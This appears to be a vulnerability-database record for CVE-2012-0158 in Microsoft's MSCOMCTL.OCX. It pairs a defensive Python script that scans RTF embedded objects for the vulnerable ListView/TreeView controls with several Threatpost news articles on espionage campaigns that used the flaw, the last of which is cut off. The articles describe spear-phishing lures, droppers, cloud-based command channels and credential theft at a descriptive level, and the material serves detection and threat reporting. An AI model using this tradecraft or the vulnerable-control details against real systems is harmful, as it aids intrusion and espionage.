The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."
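The record above names the MSCOMCTL ListView and TreeView controls and a crafted .rtf file as one delivery vector. The following Python triage script is added here as an example; it is not part of the CVE record or of any vendor tooling. It walks every `\objdata` group in an RTF file, decodes the hex blob, and flags blobs that carry the ListView/TreeView CLSID (in the mixed-endian form compound files use) or ProgID. The two CLSIDs are the ones a stock MSCOMCTL.OCX install registers as I know them and should be verified against your own build; the sample RTF and its OLE1-style prefix are constructed for the demo. A hit only means the document can reach the vulnerable control, not that it exploits it, so treat it as "send to sandbox", and note that heavily obfuscated RTF (control words spliced into the hex run, `\bin` raw data) can slip past this simple decoder.

```python
"""Triage helper: flag RTF files embedding the MSCOMCTL controls named in CVE-2012-0158.

Added example, not vendor code.  Presence of the control is necessary for the
exploit, not proof of one.
"""
import re
import uuid

# CLSIDs registered for MSComctlLib.ListViewCtrl.2 / TreeViewCtrl.2 on a stock
# install (assumed; verify against your own MSCOMCTL.OCX registration).
SUSPECT_CLSIDS = {
    "BDD1F04B-858B-11D1-B16A-00C0F0283628": "ListView",
    "C74190B6-8589-11D1-B16A-00C0F0283628": "TreeView",
}
# ProgIDs as they appear in the OLE1 wrapper inside \objdata and in \objclass.
SUSPECT_PROGIDS = {
    b"MSComctlLib.ListViewCtrl": "ListView",
    b"MSComctlLib.TreeViewCtrl": "TreeView",
}

_OBJDATA = re.compile(rb"\\objdata", re.IGNORECASE)
_CONTROL_WORD = re.compile(rb"\\[a-zA-Z]+-?\d* ?")
_HEX = re.compile(rb"[0-9a-fA-F]")


def _group_body(data: bytes, start: int) -> bytes:
    """Bytes from `start` up to the '}' that closes the enclosing RTF group."""
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":          # skip the escaped character (\{ \} \\ or a control word start)
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            if depth == 0:
                return data[start:i]
            depth -= 1
        i += 1
    return data[start:]


def extract_objdata(rtf: bytes) -> list[bytes]:
    """Decode every \\objdata hex blob into raw bytes (control words and whitespace dropped)."""
    blobs = []
    for m in _OBJDATA.finditer(rtf):
        body = _CONTROL_WORD.sub(b"", _group_body(rtf, m.end()))
        hexdigits = b"".join(_HEX.findall(body))
        if len(hexdigits) % 2:          # tolerate a truncated trailing nibble
            hexdigits = hexdigits[:-1]
        if hexdigits:
            blobs.append(bytes.fromhex(hexdigits.decode("ascii")))
    return blobs


def find_suspect_controls(rtf: bytes) -> list[str]:
    """Return sorted, de-duplicated indicators of the ListView/TreeView controls in `rtf`."""
    hits = set()
    for blob in extract_objdata(rtf):
        for clsid, name in SUSPECT_CLSIDS.items():
            # Compound-file directory entries store the CLSID as Data1/2/3 little-endian.
            if uuid.UUID(clsid).bytes_le in blob:
                hits.add(f"{name} CLSID {clsid}")
        for progid, name in SUSPECT_PROGIDS.items():
            if progid in blob:
                hits.add(f"{name} ProgID {progid.decode()}")
    for progid, name in SUSPECT_PROGIDS.items():   # \objclass in the RTF text itself
        if re.search(rb"\\objclass\s*" + re.escape(progid), rtf):
            hits.add(f"{name} \\objclass")
    return sorted(hits)


def _build_sample(payload: bytes) -> bytes:
    """Constructed RTF wrapping `payload` as a line-wrapped \\objdata hex blob (demo input only)."""
    hexed = payload.hex().encode("ascii")
    lines = b"\n".join(hexed[i:i + 64] for i in range(0, len(hexed), 64))
    return b"{\\rtf1\\ansi{\\object\\objocx{\\*\\objdata " + lines + b"}}\\par Hello}"


# Constructed samples: an OLE1-style prefix, a class name, then (for the suspect one) the CLSID.
SAMPLE_LISTVIEW = _build_sample(
    b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"MSComctlLib.ListViewCtrl.2\x00"
    + uuid.UUID("BDD1F04B-858B-11D1-B16A-00C0F0283628").bytes_le + b"\x00" * 16)
SAMPLE_BENIGN = _build_sample(
    b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"Package\x00" + b"\x00" * 16)


if __name__ == "__main__":
    import sys
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [
        ("sample-listview.rtf", SAMPLE_LISTVIEW), ("sample-benign.rtf", SAMPLE_BENIGN)]
    for name, data in targets:
        hits = find_suspect_controls(data)
        print(f"{name}: {'SUSPECT ' + ', '.join(hits) if hits else 'no MSCOMCTL ListView/TreeView'}")
```

Run it with one or more .rtf paths; with no arguments it scans the two constructed samples. Pair a hit with the Office/MSCOMCTL patch level of the host that opened the file before deciding whether anything actually executed.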
{"threatpost": [{"lastseen": "2018-10-06T23:00:46", "description": "More and more, we\u2019re hearing about a crossing of the streams, if you will, between cybercrime and state-sponsored attackers. Elements of malware, code persistence and distribution techniques are bleeding over from one realm of hacking into the other as each side tries to fill gaps in their respective portfolios.\n\nThe most recent example comes from Safe, a targeted espionage malware campaign recently reported on by Trend Micro. Safe has all the elements of a state-sponsored endeavor yet it seems to have been written by a third-party professional software developer with textbook code snippets, extensive commenting throughout the source code and an air of commercialization.\n\n\u201cAs the tools used in targeted attacks are exposed, attackers may look for new custom malware to circumvent defenses. As a result, attackers may increasingly look to the cybercriminal underground for new malicious tools instead of developing their own tools for exclusive use,\u201d wrote Kyle Wilhoit and Nart Villeneuve in a paper.\n\nSafe, named after the filenames given to several of the malware components, has hit a relatively small number of targets, namely nongovernmental organizations (NGOs), technology companies, government agencies, academic research institutions and media companies. To date, nearly 12,000 unique IP addresses from more than 100 countries have connected to a pair of command and control infrastructures.\n\nEach command and control server had its own set of marching orders for the malware and targets. 
One snared just three live victims, the report said, most of those in Mongolia, while the other had significantly more, and most of those connections originated in India, the U.S., China and Pakistan.\n\nFrom clues discovered from a misconfiguration on one of the C&C servers, the researchers were able to see all of its directories, view victim information and download backup archives that included source code used for the server and malware.\n\n\u201cThis is realistically about a developer who may be cybercrime oriented, but a malware campaign that is espionage oriented,\u201d Wilhoit told Threatpost, adding that this type of professional code development is not uncommon in either the cybercrime or cyberespionage arenas.\n\nAttacks begin with spear phishing emails containing spiked Microsoft Office documents exploiting CVE-2012-0158. The spear phishing messages are targeting Tibetan activists with information about an interview with the exiled Dalai Lama. The attachment is titled: NBC Interview Excerpts. CVE-2012-0158 was also used in the [Red October espionage campaign](<http://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/>) as well as other attacks against [Tibetan activists](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) in China or in exile elsewhere worldwide.\n\nOnce the document is opened, the victim sees a decoy document while files are downloaded in the background, including a .dll file called Safe.Ext which contains the malware and SafeCredential.DAT which contains an RC4 encryption key as well as command and control server information and the targets. Each victim is assigned a unique identifier. 
The second stage of the attack then executes and a number of data exfiltration plug-ins are installed, as well as a number of credential-stealing tools targeting the major browsers and Remote Desktop Protocol.\n\nAside from the malware, the two C&C servers don\u2019t seem to have anything in common. While one uses Mongolian domain names, the second holds nonsensical domain names such as getapencil[.]com. No attack vectors have been discovered for the second server, Trend Micro said. The domains in the second server are registered to a wanxian at 126[.]com, the same address used to register another 17 domains including five C&C servers used in the iMuler and Enfal malware campaigns, Trend Micro said.\n\nThe researchers\u2019 access to the source code illustrated the professionalism at play with this campaign. Apparently, the author had access to source code from a Chinese ISP and used that code in the building of the C&C server.\n\n\u201cWe believe the malware author is a professional software engineer that is familiar with version control. We also found indicators that this individual is proficient in software development due to the high quality of the source code he used. The entire source code was explicitly written with future development in mind. It was modularized and heavily commented on in a way that allows further development even by several engineers,\u201d the paper said. 
\u201cThese qualities are traditionally seen in the work of professional software engineers that have been taught traditional computer science.\u201d\n\nWilhoit told Threatpost they are still investigating and would not release any specific information about targets or the types of data being exfiltrated.\n", "cvss3": {}, "published": "2013-05-20T14:47:14", "type": "threatpost", "title": "Safe Targeted Espionage Campaign Borrows from Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-05-23T10:56:25", "id": "THREATPOST:2154D4513B1B000120D100B6FE1F0D83", "href": "https://threatpost.com/targeted-espionage-attack-borrowing-from-cybercriminals/100705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "A Russian APT group tied to ongoing attacks against military and political targets in Eastern Europe and against NATO could also have ties to the [MiniDuke espionage campaign](<http://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569>) uncovered more than a year ago.\n\nDubbed [APT28](<http://www.fireeye.com/resources/pdfs/apt28.pdf>) by FireEye in a report published last night, the Russian hackers have targeted Eastern European governments and military organizations, the government of the country of Georgia, as well as NATO and the Organization for Security and Cooperation in Europe (OSCE). The group, FireEye said, operates as a professional team with indicators of long-term software development planning and operational security tactics in place. 
They operate during business hours, on Moscow time, and use phishing lures specific to government and military officials of political and strategic value to the Russian government, the report said.\n\nKaspersky Lab Global Research & Analysis Team expert Aleks Gostev said this same group is also known as Sofacy and may have ties to the MiniDuke campaign. The [MiniDuke campaign also was used for political and military espionage](<http://threatpost.com/miniduke-apt-campaign-returns-with-new-targets-hacking-tools/107008>) but relied on a number of unusual tactics in a shotgun-style approach with 59 victims in 23 countries, most of those in Europe.\n\nLike MiniDuke, APT28 relies on phishing emails to penetrate organizations. The messages are spiked with convincing decoy documents that kick off a string of infections and backdoors where stolen information is ultimately encrypted and sent to a command and control server.\n\nLaura Galante, manager of threat intelligence at FireEye, said they have not been able to determine how successful APT28 has been with these three particular sets of targets.\n\n\u201cThat\u2019s part of the open question,\u201d Galante said. \u201cWe can see the targets in Eastern Europe by the lures they use and domains they\u2019ve registered, but we don\u2019t have perfect visibility on what they\u2019re doing with the targets they\u2019re able to compromise. If you can get into the email of an Eastern European military attache, what are they doing with the stolen communication? I would wager they\u2019re probably using it to think about their own policy decisions and shape their responses to military and political affairs.\u201d\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007. 
The development platforms are flexible and built for long-term use, and the coders are skilled not only at building custom malware, but also coding in barriers that complicate reverse engineering and other forensic analysis.\n\nFireEye said in its report that the malware samples include Russian language settings and were compiled in a Russian language build environment starting in 2007\u2014more than 96 percent of the samples were compiled between Monday and Friday and 89 percent between 8 a.m. and 6 p.m. UTC+4 time zone, FireEye said.\n\nThree primary targets all have political or military value to the Russian government. Attacks on one target, the Georgian government, ramped up following the 2008 war with Georgia and that country\u2019s subsequent growing ties to the West. Specifically, attacks against the Georgian Ministry of Internal Affairs and the Ministry of Defense were carried out. Spear phishing attacks tailored to particular people or organizations at each ministry were found, each with a different exploit for a Microsoft Office vulnerability.\n\n\u201cIn general, the group relies on older exploits, such as CVE-2012-0158, and it does not appear to be as sophisticated in terms of technical skills as other groups, for instance [Turla](<http://threatpost.com/epic-operation-kicks-off-multistage-turla-apt-campaign/107612>),\u201d Kaspersky\u2019s Gostev said.\n\nSeparate attacks were also discovered against the Eastern European Ministry of Foreign Affairs, the Polish government, NATO, OSCE, defense attaches working in Eastern European countries, and even attendees of European defense exhibitions, each following a similar pattern as other APT28 attacks, FireEye said.\n\n\u201cThe malware used in these attacks has some interesting features, but when you\u2019re thinking about how they\u2019re getting on networks, they\u2019re still relying on spear phishing,\u201d Galante said. 
\u201cThey\u2019re still requiring and dependent on a user mistake to get on a network.\u201d\n\nThe malware, Galante said, is custom built by the group. Once a victim opens a spear phishing email and executes the malware tucked in the tainted Office attachment, a dropper malware loads the Sofacy downloader which grabs second-stage malware from a command and control server, Galante said. A backdoor is established for anything from shellcode execution, credential theft and system monitoring. Implants are then dropped onto the victim\u2019s machine that include counter reverse-engineering features that disrupt static analysis of the malware. Stolen data is protected with RSA encryption as it moves from the victim to the controller, FireEye said.\n\nUnlike Chinese APT groups that have been unmasked, Galante said Russian groups don\u2019t generally steal intellectual property.\n\n\u201cWith the Russian group, the victim set is narrow and the type of operations occurring are distinct from intellectual property and financial data theft that the Chinese groups focus on,\u201d Galante said. \u201cThe majority of Chinese groups go after trade secrets to help their state-owned enterprises in China. 
Sure there is a military and political application to a lot of the information taken by Chinese groups, but the defining feature is secrets from economic sectors.\u201d\n", "cvss3": {}, "published": "2014-10-28T12:23:03", "type": "threatpost", "title": "Russian APT28 Group Linked to NATO, Political Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-10-28T16:23:03", "id": "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "href": "https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:47", "description": "A new malware campaign has been hitting Pakistan hard over the last few months and after a little e-sleuthing, it appears the not-so-stealthy attacks have been originating from nearby India and abusing a code-signing certificate to run their binaries.\n\nSecurity firm Eset has a full rundown of the campaign today on its [WeliveSecurity.com](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>) blog by malware researcher Jean-Ian Boutin, including an array of details involving how the attack has been executed and the types of payloads being deployed on unsuspecting Pakistanis\u2019 computers.\n\nThis campaign relies on the abuse of a bogus, digitally signed certificate from the Indian company Technical and Commercial Consulting Pvt. Ltd. The certificate was initially issued in 2011 and was revoked for files signed after March 2012. 
Even so, the certificate was used to sign more than 70 different malicious binaries on and off from that March until September of that year.\n\nThe malware uses two vectors \u2013 the first is a well-known Word document vulnerability, CVE-2012-0158, that\u2019s been used in everything from the [Red October campaign](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) to a bevy of [attacks against Tibetan and Uyghur users](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) as of late. The other vector spread Word and PDF files that once opened, \u201cdownloads and executes additional malicious binaries.\u201d Some of those files are disguised as \u201cpakistandefencetoindiantopmiltrysecreat.exe\u201d and \u201cpakterrisiomforindian.exe,\u201d according to the blog post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045755/pakistan_india.jpg>)\n\nPayloads are set up to glean data \u2013 screenshots, keystrokes, documents in the computer\u2019s trash \u2013 from users\u2019 computers and in turn send them to the attackers\u2019 servers. 
Interestingly enough, as Boutin notes, the information is being uploaded to the attacker\u2019s computer unencrypted, so it\u2019s easy to see what exactly is being transferred.\n\nThe blog also notes a number of Indian connections, including the mysterious Indian code signing certificate, references to Indian culture in the binaries and signing timestamps between 5:06 and 13:45, consistent with eight hour shifts worked in India.\n\nAn accompanying graph in the blog entry suggests that while other nations are being hit by the campaign, it\u2019s largely affecting Pakistan, with 79 percent of the targets affecting that South Asian country.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045751/detection_distribution.png>)\n\nA similar type of malware, [Redpill](<http://threatpost.com/data-stealing-spyware-redpill-back-targeting-india-041113/>), was found hijacking users in India last month. That campaign also stole screenshots, in addition to bank account credentials and email information and was the second coming of a malware strain that made its first appearance in 2008.\n\nBoutin\u2019s full research on the malware targeting Pakistan is being presented at the Caro Workshop, a security conference in Bratislava, Slovakia tomorrow. 
For more on his research, head to [ESET\u2019s blog](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>).\n", "cvss3": {}, "published": "2013-05-16T16:04:21", "type": "threatpost", "title": "Spyware Campaign Originating in India Targeting Pakistanis", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-05-16T20:04:21", "id": "THREATPOST:7719EB430C620858B2504EA847A9A096", "href": "https://threatpost.com/new-india-based-spy-malware-campaign-targeting-pakistanis/100664/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:01", "description": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries, has now pointed its focus inward at China\u2019s autonomous territory Hong Kong.\n\nAn August attack against several media companies in Hong Kong was carried out shortly after a high-profile controversy over [an appointment at the prestigious Hong Kong University](<http://www.scmp.com/news/hong-kong/education-community/article/1844800/why-scuffle-hong-kong-universitys-appointment?page=all>). This is not the first time China has targeted media outlets, especially in Hong Kong, in particular seeking out journalists\u2019 sources and attempting to stay ahead of a news cycle. 
In January 2013, hackers, allegedly connected to the Chinese government, were blamed by Mandiant for a [breach at the _New York Times_](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>)_._ The group targeted the email accounts of investigative journalists looking into alleged corruption involving then-Chinese premier Wen Jiabao.\n\nThe group targeting Hong Kong media outlets is called [admin@338](<https://threatpost.com/mh-370-related-phishing-attacks-spotted-against-government-targets/105024/>) and is known to researchers for using publicly available [remote access Trojans such as Poison Ivy](<https://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022/>) to attack government and financial firms specializing in global economic policy.\n\nIn this case, researchers at FireEye said that this is one of the first instances this group has used [phishing lures written in Chinese](<https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html>) against targets. Three attachments accompanied each phishing email, all of which were exploits for a patched Microsoft Office vulnerability, [CVE-2012-0158](<https://securelist.com/analysis/publications/37158/the-curious-case-of-a-cve-2012-0158-exploit/>), a buffer overflow in the Windows Common Control Library (MSCOMCTL.OCX) patched in early 2012.\n\nOnce executed, a backdoor called Lowball is dropped onto the compromised machine which then connects to a legitimate Dropbox account belonging to the attackers. This first stage of the attack runs a number of commands on the infected computer and sends the output to the Dropbox account, said FireEye principal threat analyst Nart Villeneuve. 
The attackers retrieve the information, analyze it, and if the target is worthy, a second stage backdoor is delivered called Bubblewrap, a much more traditional backdoor that is used for remote control and stealing data.\n\nVilleneuve said that APT gangs could soon be trending toward involving cloud-based services such as Dropbox as part of their attacks.\n\n\u201cThese attackers are using Dropbox because it provides them with a way to disguise their activities,\u201d Villeneuve said. \u201cAnyone looking at the traffic would see only encrypted connections going to Dropbox rather than traffic associated with known malware.\u201d\n\nThe phishing emails began showing up in the inboxes of Hong Kong-based newspapers, television and radio stations, targeting journalists with tidbits about current events including one purporting to be from alumni of Hong Kong University sharing their concerns over a vote to appoint a vice-chancellor at the school being influenced by Beijing. The first stage of the attack, Villeneuve said, is essentially reconnaissance. Once the exploit is executed, it connects to Dropbox using the service\u2019s API and creates a file in Dropbox using the name of the compromised host. The file contains IPconfig data, user and domain information, and lists of program files and recently created documents.\n\n\u201cThe attackers look at the information and determine if the target is of interest. 
If they are, they then put an executable in the Dropbox account so that the next time the compromised host checks in, it pulls down the executable and a well-known backdoor is dropped giving them real-time access to the host.\u201d\n\nFireEye said it shared its findings with Dropbox, which investigated further and found a separate and larger attack that is likely connected to the same group.\n\n\u201c[Dropbox] found another set of activity using malware that was almost the same and in that case, the attack appeared to be much larger, about 50 targets,\u201d Villeneuve said, adding that the second attack is ongoing. \u201cWe are pretty sure this second cluster of activity is related. There\u2019s nothing we can link them to other than it looks the same, with multiple Dropbox accounts and a few more targets.\u201d\n", "cvss3": {}, "published": "2015-12-01T11:37:53", "type": "threatpost", "title": "China APT Gang Targets Hong Kong Media via Dropbox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T16:37:53", "id": "THREATPOST:1842F12350B277A2FE1B6F4AF2F1BFDB", "href": "https://threatpost.com/china-apt-gang-targets-hong-kong-media-via-dropbox/115513/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:05", "description": "With antiquated gear running the country\u2019s industrial control systems that oversee critical infrastructure, it\u2019s no shock attackers targeting SCADA networks do their fair share of reconnaissance looking for weak spots in that equipment.\n\nA researcher decided to put that theory to a practical test recently when he deployed three dummy websites, honeypots essentially, that accurately mimicked Internet-facing management interfaces for a real-world water pressure station, a server hosting a human machine interface (HMI) system and another machine hosting a real programmable logic controller (PLC).\n\nWhat threat researcher Kyle 
Wilhoit of Trend Micro found during a 28-day trial was that attackers are determined to access SCADA networks and ICS devices and come armed not only with working knowledge of devices and their default configurations, but with purpose-built malware, and the desire to modify industrial processes if they\u2019re able to successfully access a system.\n\n\u201cI didn\u2019t expect the attack scenarios I saw happen,\u201d Wilhoit told Threatpost. \u201cI didn\u2019t expect attackers to look at the site admin stuff and deeper into the company behind the gear. I can now draw a parallel to the reconnaissance attackers do on companies and infrastructure; we see a lot of those parallels on devices now.\u201d\n\nDuring the trial, 39 attacks were carried out against the honeypots, originating in 14 countries, most of them coming from China, Laos and the United States. For the purposes of his [research](<http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-whos-really-attacking-your-ics-equipment.pdf>), which was presented at Black Hat EU last week, Wilhoit did not consider automated port scans and SQL injection attempts as attacks. The only attempts considered attacks were those that were a threat to a secure area of the websites, attempts to modify a controller, attacks on specific SCADA protocols such as Modbus, and attempts to gain access to cause damage.\n\nThe sites were left exposed online with default configurations, including default credentials such as admin/admin or SA/SA. Text on the sites was optimized for search engines so that Google and others would easily find them, and the server names, for example, were fairly attractive names such as SCADA-1.\n\nThe result was a disturbing view into the activities around these critical systems. 
One incursion was able to gain access to a supposed water pumping station and shut it down or modify water output temperatures, in one case to 170 degrees Fahrenheit.\n\n\u201cThey logged in, made a modification and logged out,\u201d Wilhoit said. \u201cThese were repeat attacks based on default credentials for specific ICS and SCADA equipment. They were able to modify it directly and perform what was perceived to be catastrophic damage. They definitely thought they were successful.\u201d\n\nWilhoit said 12 of the attacks were unique and targeted the specific equipment in use; 13 were repeated by the same attackers, indicating some sort of automation and targeting. Some attackers would come back at the same times twice a day and try to exploit the same vulnerabilities over and over, or move on to new attacks once they were unable to exploit one.\n\nMost of the attacks logged by the honeypots were unauthorized access attempts to diagnostics pages, or attempts to modify Modbus traffic; Modbus is a communications protocol specific to ICS and SCADA equipment. One of the malware attacks originated with a spear phishing email carrying a malicious Word document exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a vulnerability that enables remote code execution used in many targeted attacks. Another attack attempted to use an unauthorized Modbus client to gain read/write access to the PLC honeypot, a sign reconnaissance is occurring, Wilhoit said.\n\nThe bigger question, however, is why. Why is this gear online with default credentials and configurations and how many attacks where pumping stations are shut down or water temperature is modified occur?\n\n\u201cThe primary reason this is occurring is that these systems were deployed 20 to 30 years ago, prior to security architecture being the way it is today,\u201d Wilhoit said. 
\u201cThe technology gap has gotten a lot larger, and ICS hasn\u2019t caught up to where security infrastructure is at right now. It\u2019s difficult for devices to be turned down; that will halt business in that sector for some time. If you reboot a server, coal is not coming out of the ground. That affects the bottom line.\n\n\u201cIt also begs the question: Are companies disclosing it, or are they even aware it\u2019s occurring,\u201d Wilhoit said. \u201cThere\u2019s quite a big separation from the security guy and the ICS engineer whose main responsibility is to ensure devices stay up and are operational. Would they even be aware? I don\u2019t know, but I\u2019d be comfortable in saying these types of attacks are occurring.\u201d\n", "cvss3": {}, "published": "2013-03-19T19:04:12", "type": "threatpost", "title": "Attacks on SCADA, ICS Honeypots Modified Critical Operations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-05-07T19:38:25", "id": "THREATPOST:BBF9233468A677A95C5E9D149089804E", "href": "https://threatpost.com/attacks-scada-ics-honeypots-modified-critical-operations-031913/77642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:43", "description": "The attackers behind the [Red October APT campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413>) that was exposed nearly two years ago have resurfaced with a new campaign that is targeting some of the same victims and using similarly constructed tools and spear phishing emails.\n\nRed October emerged in January 2013 and researchers found that the attackers were targeting diplomats in some Eastern European countries, government agencies and research organizations with malware that could steal data from desktops, mobile devices and FTP servers. 
The attackers had a wide variety of tools at their disposal and used unique victim IDs and had exploits for a number of vulnerabilities. The Red October attacks began with highly targeted spear phishing emails, some of which advertised a diplomatic car for sale.\n\nThe new CloudAtlas campaign, disclosed Wednesday by researchers at Kaspersky Lab, also uses that same spear phishing lure and has targeted some of the same victims hit by Red October. Researchers believe the same group may be behind both campaigns, based on similarities in tactics, tools and targets.\n\n\u201cIn August 2014, some of our users observed targeted attacks with a variation of [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) and an unusual set of malware. We did a quick analysis of the malware and it immediately stood out because of certain unusual things that are not very common in the APT world,\u201d researchers at Kaspersky said in an [analysis](<https://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/>) of the attack. \n\n\u201cAt least one of them immediately reminded us of RedOctober, which used a very similarly named spearphish: \u201cDiplomatic Car for Sale.doc\u201d. As we started digging into the operation, more details emerged which supported this theory. Perhaps the most unusual fact was that the Microsoft Office exploit didn\u2019t directly write a Windows PE backdoor on disk. Instead, it writes an encrypted Visual Basic Script and runs it.\u201d\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines. In one case, a machine was attacked only twice in the last two years, once by Red October and once by CloudAtlas. Both campaigns also hit victims in the same countries: Russia, Belarus, Kazakhstan and India. 
The two campaigns also use similar malware tools.\n\n\u201cBoth Cloud Atlas and RedOctober malware implants rely on a similar construct, with a loader and the final payload that is stored encrypted and compressed in an external file. There are some important differences though, especially in the encryption algorithms used \u2013 RC4 in RedOctober vs AES in Cloud Atlas,\u201d Kaspersky researchers said.\n\n\u201cThe usage of the compression algorithms in Cloud Atlas and RedOctober is another interesting similarity. Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u2018scheduler\u2019 plugin uses it to decompress executable payloads from the C&C.\u201d\n\nThe C2 infrastructure for the CloudAtlas campaign is somewhat unusual. The attackers are using accounts at Swedish cloud provider CloudMe to communicate with compromised machines.\n\n\u201cThe attackers upload data to the account, which is downloaded by the implant, decrypted and interpreted. 
In turn, the malware uploads the replies back to the server via the same mechanism,\u201d the researchers said.\n\nOfficials at CloudMe said on Twitter that they are working to delete any CloudAtlas C2 accounts.\n\n\u201cYes, we are permanently deleting all accounts that we can identify as involved in the [#inception](<https://twitter.com/hashtag/inception?src=hash>) [#cloudatlas](<https://twitter.com/hashtag/cloudatlas?src=hash>) [#apt](<https://twitter.com/hashtag/apt?src=hash>) [#surveillance](<https://twitter.com/hashtag/surveillance?src=hash>),\u201d the company [said](<https://twitter.com/CloudMe_com/status/542636290274246656>).\n\nResearchers at Blue Coat have also looked at the new campaign, which they\u2019ve named Inception, and found that the attackers have created tools to compromise a variety of mobile platforms, as well.\n\n\u201cThe framework continues to evolve. Blue Coat Lab researchers have recently found that the attackers have also created malware for Android, BlackBerry and iOS devices to gather information from victims, as well as seemingly planned MMS phishing campaigns to mobile devices of targeted individuals. To date, Blue Coat has observed over 60 mobile providers such as China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but the real number is likely far higher,\u201d Snorre Fagerland and Waylon Grange from Blue Coat Lab wrote.\n\n_Image from Flickr photos of [Kevin Dooley](<https://www.flickr.com/photos/pagedooley/>). 
_\n", "cvss3": {}, "published": "2014-12-10T11:12:07", "type": "threatpost", "title": "Red October Attackers Return With CloudAtlas APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-12-11T17:50:33", "id": "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "href": "https://threatpost.com/red-october-attackers-return-with-cloudatlas-apt-campaign/109806/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:45", "description": "Researchers have discovered a mature attack platform that\u2019s enjoyed great success eluding detection and made good use of an exploit present in a number of espionage campaigns.\n\nThe attacks have concentrated largely on the automotive industry, hitting large companies primarily in Asia and only after being tested against activist targets in the region. Nicknamed [Grand Theft Auto Panda](<http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml>) by researcher Jon Gross of Cylance, the attacks rely on the well-worn exploits used against [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). Malicious Microsoft Office documents are sent to the victim, who must interact with the .xls, .doc, or other file in a phishing email or website in order to exploit the vulnerability and inject malware or cause a service disruption.\n\nThese attacks are not carried out on the same scale as those by the [Comment Crew](<http://threatpost.com/comment-crew-expos-new-level-china-attack-attribution-021913>) or other high profile APT gangs. 
